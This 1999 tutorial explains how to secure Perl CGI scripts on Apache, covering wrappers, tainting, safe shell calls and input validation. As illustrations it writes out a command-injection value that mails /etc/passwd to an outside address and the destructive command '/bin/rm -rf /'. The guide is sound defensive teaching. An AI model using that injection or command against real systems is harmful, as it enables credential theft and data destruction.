
CGI Security : Better Safe than Sorry


Published on: Sunday 19th September 1999 By: Pankaj Kamthan

Introduction
- CGI Security Breach : Origins And Consequences
Server-Side Configuration for CGI Scripts
THE Language of Choice : Compiled Vs. Interpreted
- Embedded Interpreters in Apache and CGI Scripts
HTML Forms and the CGI Script
Information (Over)exposure
Exposing External Data to the Shell
- Tainting
Backtick Quotes
Calling Shell Commands eval(),exec(),system()
Path Environment Variable to Resolve Partial Path Names to Locate External Programs
General Considerations
Pre-Built CGI Scripts : There is no Free Lunch
Conclusion
Acknowledgements
References
Appendix : A Summary of Perl Regular Expressions

Introduction

CGI is the first and remains one of the most widely-used means of extending Web servers by interfacing external applications, offering various advantages.

However, the power of CGI comes with a price. CGI interfaces can completely compromise the security of a Web server, and thus that of the host on which it is running. All benefits of a CGI script are neutralized if it is insecure. It is impossible to anticipate (and defend against) all security holes. But by following a few guidelines, you can avoid known security holes and unsafe practices.

In dealing with the CGI security issues, our focus will be the following questions:

What type of potential CGI security problems exist? How do they arise? What can be the consequences of these problems? How, and to what extent, can these problems be eliminated?

For the sake of this article, we will restrict ourselves to UNIX-type environments, although many ideas presented here carry over to other systems. When referring to a programming language, we will refer to Perl exclusively as it has established itself as the language of choice for CGI programming. Also, even though the CGI is independent of any server, we will incline our discussion towards Apache, the most popular Web server in use today.

CGI Security Breach : Origins and Consequences

The first step towards tackling the CGI security issues requires finding the origins of the problems. This in turn requires identification of all the different components involved in the entire CGI communication process. (Note that not all of these are involved in all cases.) They are:

1. The User. A person, including an intruder (such as a hacker, masquerader, counterfeiter, or eavesdropper), or a program (such as a virus).
2. HTML form or searchable index.
3. HTTP and CGI protocols.
4. The CGI script.
5. Compiler/interpreter that runs the CGI script (which depends on the language the script is written in).
6. External data (that comes from the user in 1 above).
7. External programs that the script calls.
8. Client-side techniques, such as JavaScript, used in conjunction with the CGI.
9. The Web browser.
10. The Web server.

Figure 1 presents a schematic of the CGI communication between the Web client and server.

Here are some remarks on the effect of the above components. The main sources of CGI security problems are 2, 4, 6, 7 and 10, which result in insecure data, insecure code, or an insecure server. 6 can pose a major security problem when it comes in contact with 7. It is possible that 3, 5 or 7 themselves could lead to security problems, but a discussion of that is beyond the scope of this article. 8 and 9 are client-side technologies and don't really have a direct relationship with the CGI security issue. 8, however, can affect 6.

This article is primarily targeted towards developers who write CGI scripts; however, we have also provided a section for those who use pre-built CGI scripts for their purposes.


Figure 1. CGI Communication between the Web Client and Server.

CGI scripts can present security holes in two ways:

They may intentionally or unintentionally leak information about the host system that can result in a break in.
Scripts that process remote user input, such as the contents of a form or a "searchable index" command, may be vulnerable to attacks in which the remote user tricks them into executing commands.

Security holes present in CGI scripts on Web sites can be exploited for various malicious purposes, including the following:

Critical files, particularly those which contain sensitive information (such as passwords), are stolen, modified or erased by unauthorized users.
Content is sold to a competitor.
Information about the host machine is obtained which will allow unauthorized users to have access to the system.
Commands are executed on the server host machine, allowing unauthorized users to modify the system.
The site is used to launch attacks against other sites.

Server-Side Configuration for CGI Scripts

Server Configuration for CGI Scripts

CGI scripts reside within the Web server-accessible directory. Any lapses in the server configuration can lead to CGI security problems. Therefore, knowing appropriate server configurations can be helpful:

Dynamically produced indexes make an entire directory's content visible to the user. These could lead to private files such as .htaccess files being accessible without the author's knowledge. You should therefore configure the server to not generate dynamically produced indexes.
It is much easier to keep track of what CGI scripts are installed on the system if they are kept in a central location (like in the cgi-bin directory) rather than being scattered around among multiple directories. A cgi-bin directory with controlled access lessens dangerous possibilities such as someone managing to create a CGI file somewhere in your document tree and then executing it remotely by requesting its URL.
You should configure the server to not serve any document other than a *.cgi document from within a cgi-bin directory tree. Interpreters, shells, scripting engines, and other extensible programs should also never appear in a cgi-bin directory, nor should they be located elsewhere on a computer where they might be invoked by a request to a Web server process. You should also be careful not to leave any backup copies (such as filename.cgi.bak, filename.cgi~) of the script generated by certain editors.

Moral: Fix a single directory, such as cgi-bin, for serving CGI scripts only, and abide by it.
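As a rough illustration of the last point, the following sketch walks a cgi-bin tree and reports every plain file that does not end in ".cgi", which catches editor backups such as filename.cgi.bak and filename.cgi~. The function name find_stray_files and the default directory are hypothetical, and the ".cgi" convention is simply the one assumed in the text above.

```perl
use strict;
use warnings;
use File::Find;

# Return the plain files under $dir whose names do not end in ".cgi".
sub find_stray_files {
    my ($dir) = @_;
    my @stray;
    find(
        {
            no_chdir => 1,                  # $_ holds the full path
            wanted   => sub {
                return unless -f $_;        # skip directories and the like
                push @stray, $_ unless /\.cgi\z/;
            },
        },
        $dir
    );
    my @sorted = sort @stray;
    return @sorted;
}

# Hypothetical location; pass your own cgi-bin path on the command line.
my $cgi_bin = shift(@ARGV) // '/usr/local/apache/cgi-bin';
if (-d $cgi_bin) {
    print "Unexpected file: $_\n" for find_stray_files($cgi_bin);
}
```

Run from cron or before a deployment, a check of this kind only reports; deciding whether a file should be removed is left to the administrator.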

CGI Script Privileges

007 Can not be Trusted

You should make sure that the CGI scripts have only the permissions required for the task they perform. In UNIX, you can set them with the chmod command. For example, search scripts (and various others that do not let others write to the server) usually run under the mode "755."
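A script that is writable by anyone other than its owner can be replaced with hostile code. The sketch below, whose function name writable_by_others is hypothetical, tests the group and other write bits of a file's mode; a file with mode 755 passes, while 775 or 777 does not.

```perl
use strict;
use warnings;

# Return 1 if group or others may write to $path, 0 otherwise.
sub writable_by_others {
    my ($path) = @_;
    my @st = stat($path) or die "Cannot stat $path: $!";
    my $mode = $st[2] & 07777;      # keep only the permission bits
    return ($mode & 0022) ? 1 : 0;  # 0020 = group write, 0002 = other write
}
```

A check like this could be run over every file in the cgi-bin directory as part of a routine audit.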

"NOBODY" can be a Threat to Everybody

Even if the server is run as "nobody," CGI scripts are potential security holes. A subverted CGI script running as "nobody" still has enough privileges to mail out the system password file, or even launch a log-in session on a high numbered port. Even if your server runs in a chroot directory, a buggy CGI script can leak sufficient system information to compromise the host.

CGI Scripts with Extra Privileges

There are cases where some scripts need to grant some extra privileges to their users, without giving away other privileges that they didn't intend to give away. These scripts need to run with permissions different from those of the Web server itself (usually user "nobody"). On UNIX, one way to do that is to make the CGI script suid. By doing that, the script runs with the permissions of the owner of the file, rather than those of the Web server itself, which lets a CGI script access resources that it otherwise could not.

In Perl, it can be done as follows:

Create a special UNIX user for that application. Have your scripts suid to the user by setting its "s" bit. For example:
```
chmod u+s foo.cgi
```
Use Perl's emulation mode for handling suid scripts safely.
Use chroot() function for restricting the script to a particular directory. (The chroot() call restricts the root directory of a process to a specified directory within a file system.)

Running a script as suid can, however, be dangerous. The need for a script to run as suid should be carefully examined. This represents a major risk insofar as it gives your script more privileges than the "nobody" user has. Weaknesses in setuid scripts can let a malicious user access not only files that the low-privilege Web server user can access, but also any that could be accessed by the user the script runs as. (That is why scripts should be run with the lowest possible privilege.) It also increases the potential for damage that a subverted script can cause. Many UNIX systems contain a hole that allows suid scripts to be subverted. This hole affects only scripts, not compiled programs. On such systems, an attempt to execute a Perl script with the suid bits set will result in an error message from Perl itself. One way to avoid that is to run the server itself as a user that has sufficient privileges to do whatever the scripts need to do.

Moral: Make sure that CGI script permissions are set correctly. Unless absolutely necessary, do not run a script under "suid." Avoid "setuid root." In any case, use a CGI wrapper, if possible.

CGI Wrappers

CGI scripts can be made safer in some situations by placing them inside a CGI "wrapper" script. Wrappers may perform certain security checks on the script, change the ownership of the CGI process, or use the UNIX chroot() mechanism to place the script inside a restricted part of the file system.

There are three major wrappers available for UNIX systems that we discuss here:

CGIWrap

CGIWrap is a gateway program that puts a wrapper around CGI scripts and thus allows general users to use CGI scripts without compromising the security of the Web server. Scripts are run with the permissions of the user who owns the script, rather than with those of the Web server user (for example, "nobody"). In addition, several security checks are performed on the script, which will not be executed if any check fails. A policy can be enforced so that users must use CGIWrap in order to execute CGI scripts. This simplifies administration and prevents users from interfering with each other.

There are certain caveats to deploying CGIWrap. Without a wrapper, all CGI scripts run under the server's user ID, which makes it difficult for administrators to determine, for example, whose script is generating bounced mail or introducing errors in the server log. There are also security implications when all users' scripts run with the same permissions: one user's script can unintentionally (or intentionally) trash the database maintained by another user's script. CGIWrap addresses these problems, but it increases the risk to the individual user: because a script runs with its owner's permissions, a subverted CGI script can trash the user's home directory by executing the command:

/bin/rm -rf /

Since the subverted CGI script has write access to the user's home directory, it could also place a trojan horse in the user's directory.

SBOX

sbox, like CGIWrap, can run CGI scripts as the author's user ID. However, it takes additional steps to prevent CGI scripts from causing damage. It optionally performs a chroot to a restricted directory, isolating the script from the user's home directory. It can also set resource allocation limitations on CGI scripts which prevents certain denial-of-service attacks.

suEXEC

The Apache Web server comes with its own wrapper script called suEXEC. suEXEC provides the same functionality as CGIWrap, but, in addition, you can (using the User and Group directives in the <VirtualHost> section of the configuration file httpd.conf) have scripts run with the permissions of that user and group.

Normally, when a CGI or Server-Side Includes (SSI) script executes, it runs as the same user who is running the Web server. The suEXEC feature provides Apache users with the ability to run CGI (and SSI) scripts under user IDs different from the user ID of the calling Web server. When an HTTP request is made for a CGI (or SSI) script, Apache provides the suEXEC wrapper with the script's name and the user and group IDs under which the program is to execute. The wrapper then performs a series of tests to determine success or failure of the request. If any one of the tests fails, the program logs the failure and exits with an error.

Using suEXEC requires managing setuid root programs and the security issues they present. Used properly, this feature can reduce considerably the security risks involved with allowing users to develop and run private CGI (or SSI) scripts. However, if suEXEC is improperly configured, it can cause any number of problems and possibly create new security holes in your system.

Moral: CGI wrappers are useful but they are not magic bullets. If you use them, make sure you are aware of their features (and limitations). Specifically, use suEXEC only if you have the requisite background to do so.

The Language of Choice for CGI Scripts : Compiled Vs. Interpreted

CGI scripts are written using a programming language, and the language of choice plays a key role in the security issues around them:

Interpreted languages such as Perl are used for various reasons for writing CGI scripts. However, they contain a potential security hole: the ability of the interpreter to pass arbitrary strings to a command shell for execution or to execute strings containing arbitrary statements. Compiled languages such as C are relatively safer in this respect as it requires more effort to spawn a shell. Shell scripting languages make it extremely easy to send data to system commands and capture their output. It is very difficult to write a shell script of any complexity that completely avoids dangerous constructions. Shell scripting languages are therefore poor choices for anything but trivial CGI scripts.
A remote user's access to the script's source code is another issue. Unlike a compiled language like C, with an interpreted script, the source code is always potentially available which makes it more likely that bugs in it can be exploited. Even though a properly-configured server will not return the source code of an executable script, there are many scenarios in which this can be bypassed.
Due to size and complexity, compiled code may be safer than interpreted code. Large programs, such as the shell and Perl interpreters, are more likely to contain bugs. Some of these bugs may be security holes.

All this being said, there is no guarantee that a compiled program will be safe. Interpreted languages such as Perl contain a number of built-in features (for example, the tainting mechanism) that were designed to catch potential security holes, and may make Perl scripts safer in some respects than the equivalent C program.

Embedded Interpreters in Apache and CGI Scripts

Apache can be extended by embedding language interpreters. For example, mod_perl is an Apache module which embeds the Perl language interpreter into it. This opens up an entire host of applications that were not previously possible. CGI/Perl scripts often suffer from performance problems; with mod_perl, such scripts can gain significantly in performance when run under Apache. These CGI scripts can now also access Apache internals.

Since mod_perl runs within an Apache httpd child process, it runs with the user/group ID specified in the httpd.conf file. Therefore, there are a few security considerations that you should be aware of:

The user/group should have the lowest possible privileges.
mod_perl should only have access to world readable files.
Different mod_perl scripts run successively using the same Perl interpreter instance. So, a malicious mod_perl script can redefine any Perl object and change the behaviour of other mod_perl scripts.
Enabling Perl's tainting mechanism helps you to filter data external to the script. Note that setting the -T switch on the first line of the script is not sufficient to enable tainting checks under mod_perl. You have to include the directive PerlTaintCheck On in the httpd.conf file.
If your script needs extra privileges, you will have to start a new process that runs under a suitable user/group ID. If all requests handled by the script will need extra privileges, you should write it as a suid CGI script and run it with the suEXEC wrapper. Alternatively, you can pre-process the request with mod_perl and fork a suid helper process to handle only the privileged part of the task.

HTML Forms and the Script

Sanity Checks

You should perform sanity checks on form input, for example verifying that every HTML form element returns a value.
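A minimal sketch of such a check follows. It assumes the form values have already been decoded into a hash by whatever means the script uses; the function name missing_fields and the field names are made up for the illustration.

```perl
use strict;
use warnings;

# Return the names of required fields that are missing, undefined,
# or contain nothing but whitespace.
sub missing_fields {
    my ($params, @required) = @_;
    return grep {
        !defined $params->{$_} || $params->{$_} !~ /\S/
    } @required;
}

# Hypothetical decoded form data.
my %form = (name => 'Ada', email => '', comment => undef);
my @missing = missing_fields(\%form, qw(name email comment));
print "Missing: @missing\n";    # prints "Missing: email comment"
```

A script would typically refuse to continue, and return an error page, when the returned list is not empty.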

Script Invocation

Although you can restrict access to a script to certain IP addresses (using, for example, <Limit>...</Limit> directives in the Apache configuration file access.conf) or to user name/password combinations (using, for example, Basic authentication in Apache), you can not control how the script is invoked. A script can be invoked from any form, anywhere in the world and even by directly requesting its URL. Referer gateways are good examples of such a case. When restricting access to a script, restrictions should be placed on the script as well as any HTML forms that access it. This is obviously the case when the script itself (dynamically) generates the requisite HTML document (containing the forms). In other cases, you can use the CGI environment variable HTTP_REFERER, which provides the URL of the document that the browser points to before accessing the CGI script, to restrict access.
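The HTTP_REFERER test can be sketched as below. The URL and the function name referer_ok are hypothetical. Note that the Referer header is supplied by the client and can be forged or omitted, so a check like this discourages casual misuse but should not be the only access restriction.

```perl
use strict;
use warnings;

# Hypothetical URL of the form that is supposed to invoke this script.
my $EXPECTED_FORM = 'http://www.example.com/order.html';

# Return 1 if the Referer sent by the browser is exactly the expected form.
sub referer_ok {
    my ($referer) = @_;
    return (defined($referer) && $referer eq $EXPECTED_FORM) ? 1 : 0;
}
```

Inside a CGI script the call would look like referer_ok($ENV{HTTP_REFERER}), with the script returning an error page when the result is 0.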

Hidden Variables

Hidden variables should not be relied upon for security. This is because the hidden variables are in fact visible in the HTML that the server sends to the browser; all a user has to do is view the source of the document. After that, the user can set the hidden variables to his/her desire and send it back to the script. An example of a script using hidden variables (for state persistence) is the shopping cart script in the article E-Store on the Web : Let's Go Shopping!

CGI Scripts Calling External Programs

In Perl, you can invoke external programs in many different ways: you can capture the output of an external program using backtick quotes; you can open up a pipe to a program; you can invoke an external program and wait for it to return with system(); you can invoke an external program (and never return) with exec(). All of these constructions can be risky if they involve user input that may contain shell metacharacters. You should therefore try to find ways not to open a shell. It is safer to call an external program directly than to go through a shell. The only completely safe approach, not calling external programs at all, is not an option for scripts that depend on them.

Information (Over)exposure

There are scripts that leak system information. For example, CGI gateways to the UNIX finger command often print out the physical path to the fingered user's home directory, the w command gives information about what programs local users are using, and the ps command gives out valuable information on daemons running on the system.

Moral: Avoid giving out too much information about your site and server host.

Backtick Quotes

Backtick quotes (`...`), available in Perl (and shell interpreters) for capturing the output of programs as text strings, are dangerous. For example

print `/path_to/finger $input{'user_input'}`;

expects the user input to be somebody's username. However, that may not always be the case.

Moral: Avoid backticks in CGI scripts.
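One way to capture a program's output without backticks is the list form of a piped open(), available in Perl 5.8 and later, which starts the program directly instead of handing a command string to the shell. The sketch below is illustrative only: the helper name capture is hypothetical, and /bin/echo stands in for finger so that the effect is easy to see.

```perl
use strict;
use warnings;

# Run $program with @args and return everything it writes to standard output.
# Pass at least one argument: with a program and an argument list no shell is
# involved, so metacharacters in @args reach the program literally.
sub capture {
    my ($program, @args) = @_;
    open(my $fh, '-|', $program, @args)
        or die "Cannot run $program: $!";
    local $/;                       # read all output in one go
    my $output = <$fh>;
    close($fh) or warn "$program exited with status $?\n";
    return $output;
}

# The semicolon is not treated as a command separator.
print capture('/bin/echo', 'einstein; cat /etc/passwd');
```

The argument is printed back unchanged rather than being split into two commands. The program still receives whatever the user typed, so the input should be checked against the expected pattern as well.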

Calling Shell Commands eval(), exec(), system()

It is very important that you understand what damage these calls can do. In some cases, you can avoid passing user-supplied variables through the shell by calling external programs differently.

For example, here is a Perl script that tries to send mail to an address indicated in a fill-out form:

$mail_to = &get_input; # read the address from form
open (MAIL,"| /path_to/sendmail $mail_to");
print MAIL "To: $mail_to\nFrom: somebody\n\n Hello\n";
close MAIL;

The problem is in the piped open() call. The script author assumed that the contents of the $mail_to variable will always be just an e-mail address. However, this may not be the case. If the following is entered:

nobody@nowhere;mail somebody@somewhere</etc/passwd;

the open() statement will evaluate the following command:

/path_to/sendmail nobody@nowhere; mail somebody@somewhere</etc/passwd

Unintentionally, open() has mailed the contents of the system password file to the remote user, opening the host to password cracking attack.

This situation can be avoided. sendmail supports a -t flag, which tells it to ignore the address given on the command line and take its To: address from the e-mail header. There is also the -oi flag to prevent sendmail from ending the message prematurely if it encounters a period at the start of a line. The example above can be rewritten in order to take advantage of these features:

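$mail_to = &get_input; # read the address from form
# -t: recipients come from the headers, so no user data reaches the command line
open (MAIL,"| /path_to/sendmail -t -oi") or die "Couldn't run sendmail: $!";
print MAIL <<END;
To: $mail_to
From: somebody(somebody\@somewhere)
Subject: something
...
END
close MAIL;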

In Perl, (by using Perl's implementation of system() and exec() functions) you can pass arguments directly to external programs rather than going through the shell. For system() and exec(), if you pass the arguments to the external program, not in one long string, but as separate members in a list, then Perl will not go through the shell and shell metacharacters will have no undesired side effects. For example, instead of:

system "/path_to/sort < foo.in";

write:

system "/path_to/sort","foo.in";

This feature can also be used to open a pipe without going through a shell. By calling open on the character sequence |-, you fork a copy of Perl and open a pipe to that copy. The child copy can then "exec" another program using the argument list variant of exec().

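my $result = open(SORT,"|-");   # fork: the parent gets the child's PID, the child gets 0
die "Couldn't open pipe to subprocess" unless defined($result);
if ($result == 0) {
    # Child: replace this process with sort, without going through a shell
    exec "/path_to/sort",$user_variable or die "Couldn't exec sort";
}
# Parent: whatever is printed to SORT arrives on sort's standard input
for my $line (@lines) {
    print SORT $line,"\n";
}
close SORT;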

The initial call to open() tries to fork a copy of Perl. If the call fails, it returns an undefined value and the script immediately dies; otherwise it returns zero to the child process and the child's process ID to the parent. The child process checks the result value, and immediately attempts to "exec" the sort program. If anything fails at this point, the child quits. The parent process can then print to the SORT filehandle in the usual manner. To read from a pipe without opening up a shell, you can do something similar with the sequence -|:

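my $result = open(EGREP,"-|");   # fork: the child's standard output feeds EGREP
die "Couldn't open pipe to subprocess" unless defined($result);
if ($result == 0) {
    # Child: -i ignores case, -e marks the next argument as the pattern
    exec "/path_to/egrep",'-i','-e',$user_pattern,$filename
        or die "Couldn't exec egrep";
}
while (<EGREP>) {
    print "match: $_";
}
close EGREP;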

Moral: Wherever possible, avoid opening a shell. If you must open one, check the return conditions from all system calls.

Exposing External Data to the Shell

An example of exposing data to the shell, which is a potential security threat, is:

system ("/path_to/finger $user_input");

The problem is that any shell metacharacters can be passed through it. The list of shell metacharacters is extensive:

&;`'\"|*?~<>^()[]{}$\n\r

In case you have to open a shell, you should always scan the arguments for shell metacharacters and remove them. The best way is to check incoming data for the exact pattern that is desired. The Perl regular expressions that can be used for this purpose are given in the Appendix.

For example, one way to assure that the $mail_to address created by the user really does look like a valid address is:

$mail_to = &get_name_from_input;
unless ($mail_to =~ /^[\w.+-]+\@[\w.+-]+$/) {
  die 'The address is not in form einstein@irt.org';
}

Moral: Never pass unchecked remote user input to a shell command. Match legal characters rather than filtering out disallowed ones (it is much more difficult to anticipate every dangerous character).
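The same pattern can be wrapped in a small function so that every caller gets either a checked value or nothing. This is only a sketch: the name checked_address is hypothetical, and the \A and \z anchors are used in place of ^ and $ so that an address followed by a newline is rejected as well.

```perl
use strict;
use warnings;

# Return the address if the whole string matches the allowed pattern,
# otherwise return undef.
sub checked_address {
    my ($input) = @_;
    return undef unless defined $input;
    return $input =~ /\A([\w.+-]+\@[\w.+-]+)\z/ ? $1 : undef;
}

for my $candidate ('einstein@irt.org',
                   'nobody@nowhere;mail somebody@somewhere</etc/passwd;') {
    my $address = checked_address($candidate);
    print defined $address ? "accepted: $address\n" : "rejected\n";
}
```

The first candidate is accepted and the second, taken from the sendmail example earlier, is rejected because of the characters outside the allowed set.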

Tainting

One of the most frequent security problems in CGI scripts is inadvertently passing unchecked user-supplied variables or "tainted variables" to the shell. Tainted variables are those that contain data that originate from outside the script, including data read from environment variables, from the command-line arguments, or from standard input. Perl provides a "taint checking" mechanism that prevents you from doing this. This feature checks for tainted variables and refuses to pass them to subshells or to eval(). In Perl 5, the Perl "taint mode" can be enabled by placing the "-T" option on the first line of the Perl script:

#!/usr/local/bin/perl -T

(Perl 4 does not support the -T flag. Instead, Perl 4 distributions typically come with a separate executable called taintperl.)

The tainting mechanism has the following characteristics:

When enabled, tainting marks all variables that are supplied by users as "tainted." Any variable that is set using data external to the program (including data from the environment, from standard input, and from the command line) is considered tainted and cannot be used to affect anything else outside the program.
Tainted variables cannot be used in system(), exec(), piped open(), eval(), backtick commands, or any function that affects something outside the program. If you try to do so, Perl exits with an error message. Perl will also exit if you attempt to call an external program without explicitly setting the PATH environment variable. If you are trying to do something insecure, you get a fatal error saying something like "Insecure dependency" or "Insecure $ENV{PATH}."
Untainted information can only be extracted from a tainted variable by the use of Perl's string matching operations. The only way to untaint a tainted variable is by performing a pattern matching operation on it and extracting the matched substrings. For example, if you expect a variable to contain an e-mail address, you can extract an untainted copy of the address in this way:
```
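$mail_address =~ /(\S+)\@([\w.-]+)/
    or die "Unexpected address format";   # never use $1 and $2 after a failed match
$untainted_address = "$1\@$2";            # captured substrings are untainted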
```
This pattern match accepts e-mail addresses of the form "somebody@somewhere" where "somewhere" looks like a domain name, and "somebody" consists of one or more non-whitespace characters. Note that this regular expression will not remove shell metacharacters from the e-mail address. This is because it is valid for e-mail addresses to contain such characters. Just because you have untainted a variable doesn't mean that it is now safe to pass it to a shell; the taint checks help you to recognize when a variable is potentially dangerous.
Tainting can propagate; variables whose values are dependent on tainted variables are themselves tainted as well. If you use a tainted variable to set the value of another variable, the second variable also becomes tainted.
The tainting feature also requires that you set the PATH environment variable to invoke the system() call. Even if you don't rely on the path when you invoke an external program, there's a chance that the invoked program might. Therefore, you need to set it yourself at the beginning of your CGI script whenever you use taint checks, as the following example shows:
```
$ENV{'PATH'} = '/bin:/usr/bin:/usr/local/bin';
```
The above path should be adjusted according to the list of directories you want searched. It is not a good idea to include the current directory (".") in the path.
Perl ignores tainting for file names that are opened for reading only. Make sure that you check all file names yourself, not just the ones used for writing.
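Since taint mode does not stop a script from reading a file named by the user, the check has to be written by hand. The sketch below shows one possible approach, under the assumption that all data files live in a single directory; the directory and the function name safe_data_path are hypothetical.

```perl
use strict;
use warnings;

# Hypothetical directory that holds the files the script is allowed to read.
my $DATA_DIR = '/path_to/data';

# Return a path inside $DATA_DIR, or undef if the name is not acceptable.
# Only letters, digits, "_", "-" and "." are allowed, and the name may not
# begin with "." or "-", which excludes "..", hidden files, and "/" separators.
sub safe_data_path {
    my ($name) = @_;
    return undef unless defined $name;
    return undef unless $name =~ /\A([A-Za-z0-9_][A-Za-z0-9_.-]*)\z/;
    return "$DATA_DIR/$1";    # built from the captured, untainted substring
}
```

With this in place, safe_data_path('report.txt') yields a path under the data directory, while names such as '../etc/passwd' or '.htaccess' yield undef and the script can refuse the request.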

See the CGI/Perl Taint Mode FAQ for more details on the tainting mechanism in CGI/Perl scripts.

Moral: Use Perl's tainting features for all CGI scripts written in Perl.

Path Environment Variable to Resolve Partial Path Names to Locate External Programs

The PATH environment variable can be altered so that it points to the program the user wants your script to execute rather than the program you are expecting. You should invoke the programs using their full absolute pathnames instead. If you must rely on the PATH, set it yourself at the beginning of your CGI script. In general, it is not a good idea to put the current directory (".") into the path.

Moral: Invoke external programs by their absolute pathnames. If you must rely on the PATH environment variable, set it yourself.
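A typical opening for a CGI script that calls external programs might look like the sketch below. The directory list is an assumption to be adjusted for your system, and /bin/date is used purely as a harmless example program. Removing IFS, CDPATH, ENV and BASH_ENV follows the advice in Perl's own security documentation, since these variables can change how a shell behaves.

```perl
use strict;
use warnings;

# Replace the inherited PATH with a fixed list of trusted directories.
# The current directory (".") is deliberately left out.
$ENV{PATH} = '/bin:/usr/bin';

# Remove variables that can alter the behaviour of a shell or child program.
delete @ENV{qw(IFS CDPATH ENV BASH_ENV)};

# Even with a clean PATH, name the program by its absolute pathname and
# pass the arguments as a list so that no shell is involved.
system('/bin/date', '+%Y') == 0
    or warn "date failed with status $?\n";
```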

General Considerations

There are some general design considerations that can be followed to avoid CGI security problems:

CGI Security Policy. As mentioned in Chapter 13 of the book Web Security and Commerce, security is defined by policy. According to The World Wide Web Security FAQ, "... the single most important step you can take to increase your site's security is to create a written security policy." The same idea can be applied to the case of CGI security. The security policy should succinctly lay out your organization's policies with regard to different practices, which include:
- Directory on the server being used for CGI scripts.
- Programs being used to generate user passwords.
- Steps to be taken in the event of a break-in, including the contact person(s).
Race Condition. A race condition is a situation where, between two of your actions, an attacker can race in and change something to make the script behave inappropriately. For example, there can be a race between testing whether a file exists and opening it for writing. Moral: Beware of race conditions. Always set your script's environment variables.
Error Checking. Use "-w" and "use strict." Moral: Use Perl's error checking features for all CGI scripts.
Information is Power. Keep abreast of security announcements, bug fixes and patches. For example, you can subscribe to CERT or CIAC mailing lists. Subscription to the Usenet newsgroup comp.infosystems.www.cgi and the ones in the comp.security.* hierarchy can also be useful.
Only the Truth, and Nothing but the Truth. The scripts themselves should be designed and inspected to ensure that they perform only the desired task. The scripts should be run in a restricted environment. If these scripts are subverted to perform something unexpected, the damage they do will be limited.
Small is Beautiful. Make critical parts of the script as small and as simple as possible.
Test, Test, Test! Test the scripts thoroughly before using them on the Web server. Try to sabotage them in any and all ways that you can think of. If you can, probably somebody else can too.
Pass the word, Not! It is a general practice (independent of any Web technology) that "good" passwords should be used. Good passwords are those that are a combination of alphanumeric characters which do not have any correlation to the user's personal information and can not be found in dictionaries.
When things go wrong. Prevention is better than cure but then security is about being prepared for the worst scenario. You should make regular backups and keep the backup device itself in (at least) a physically safe location.
The Devil is in the Details. You should log your scripts' actions by creating and checking your log files regularly. Report any error to a dedicated log file (separate from a server log file). If you are deploying Apache as the Web server, you can use the CGI::Carp module for error handling. To trap most Perl run-time errors and send the output to the client rather than only to Apache's error log, add the line below to your script. Because such messages can reveal details of the script and the host, enable this only while debugging:
```
use CGI::Carp qw(fatalsToBrowser);
```
Round and round we (shouldn't) go. A bug in the script can put it into an infinite loop. Set (reasonable) time-outs on the real time used by the script while it is running and set (reasonable) time limits on the CPU time used by the script while it is running.
Design is the Key. Design the script carefully before you start actual coding. List all errors that might occur, the environment in which the script will run, and the I/O behaviour. Have the CGI scripts check all the arguments provided by the user. Check arguments passed to operating system functions, check return conditions from system calls, check the length of every argument and filter them. Use full pathnames for any filename arguments, for both commands and data files. Do not create files in world-writable directories.
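The race between testing for a file and opening it, mentioned under Race Condition above, can be narrowed by letting the operating system do both in one step. The following sketch uses sysopen() with the O_CREAT and O_EXCL flags, so the open fails if the file already exists; the function name create_new_file is hypothetical.

```perl
use strict;
use warnings;
use Fcntl qw(O_WRONLY O_CREAT O_EXCL);

# Create $path for writing only if it does not exist yet.
# O_CREAT|O_EXCL makes the existence test and the creation one operation,
# so nothing can slip a file (or symbolic link) in between the two.
sub create_new_file {
    my ($path) = @_;
    sysopen(my $fh, $path, O_WRONLY | O_CREAT | O_EXCL, 0600)
        or return;                  # already exists, or cannot be created
    return $fh;
}
```

A caller checks the return value, writes through the returned filehandle, and treats a failure as a reason to stop rather than to fall back to an ordinary open().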

Pre-Built CGI Scripts : There is no Free Lunch

Software reuse is a popular trend in the programming world: "avoid reinventing the wheel wherever you can." However, this practice comes with a price when programs are used as "black-boxes."

As an example, pre-built CGI scripts may contain security bugs unknown to their users. Therefore, if used at all, pre-built CGI scripts should be used with caution and various questions should be asked (and answered to a satisfactory extent) prior to their use. Here is a checklist:

How complex is the script? The longer the script, the more likely it is to have problems.
Does the script read and/or write files on the host system? Programs that read files may inadvertently violate access restrictions, or pass sensitive system information to unauthorized users. Programs that write files have the potential to modify documents, or, in the worst case, introduce trojan horses in your system.
Does the script interact with external programs on your system? If yes, does it do so in a safe manner? For example, does the script use explicit path names when invoking these programs (instead of using the PATH environment variable to resolve partial path names)?
Does the script run with suid privileges? This is usually not considered safe.
Does the script validate user input from forms? Unchecked user input is one of the primary causes of CGI security breaches.
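As an illustration of what a "safe manner" of calling external programs can look like when reviewing a pre-built script, here is a minimal sketch. The helper name `run_program` is hypothetical, the example assumes a UNIX-type system with `/bin/echo` present, and the list of environment variables to clear follows the perlsec documentation.

```perl
use strict;
use warnings;

# Fix the search path and remove variables that can change how a
# shell behaves (this list follows the perlsec documentation).
$ENV{PATH} = '/bin:/usr/bin';
delete @ENV{qw(IFS CDPATH ENV BASH_ENV)};

# Run an external program by its full path, passing the arguments as
# a list so that no shell parses them. Returns the program's output.
# Call it with at least one argument to get the list form of open.
sub run_program {
    my ($program, @args) = @_;
    die "refusing partial path: $program\n" unless $program =~ m{\A/};
    open(my $fh, '-|', $program, @args)
        or die "cannot run $program: $!\n";
    my $output = do { local $/; <$fh> };
    close($fh) or die "$program failed\n";
    return $output;
}

# The semicolon is passed to echo as ordinary text; "ls /" never runs.
print run_program('/bin/echo', 'hello; ls /');
```

A pre-built script that instead builds a single command string from user input and hands it to `system()` or to backticks deserves a closer look before it is installed.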

For a detailed account of this issue, see the article Security Issues When Installing and Customizing Pre-Built Web Scripts.

Moral: Use pre-built CGI scripts with caution and perform security checks before using them. If these scripts are in Perl, you should enable the Perl-specific security mechanisms, such as taint checking. Regularly visit the sites that distribute them for updates and patches.

Conclusion

CGI Ahead : Script with Caution

Computer security is a give-and-take situation. There is no perfectly secure system. Thus, security is more about acceptable risk and emergency recovery than impregnability. That being said, not all possible CGI security problems (and hence solutions) can be identified a priori. The practices described here reduce the risk of security breaches but don't eliminate it. Also, even if the script seems safe, there is always the possibility that the external programs it uses may themselves be vulnerable.

Acknowledgements

Many of the examples introduced in the section CGI Scripts Calling External Programs are adapted from The World Wide Web Security FAQ, and their use is hereby acknowledged.

References

W3C Security Resources.
CGI Programming on the World Wide Web, By Shishir Gundavaram, O'Reilly & Associates, 1996. Appendix A: Perl CGI Programming FAQ. (Also available as Perl CGI Programming FAQ, Maintained by Tom Christiansen and Shishir Gundavaram.)
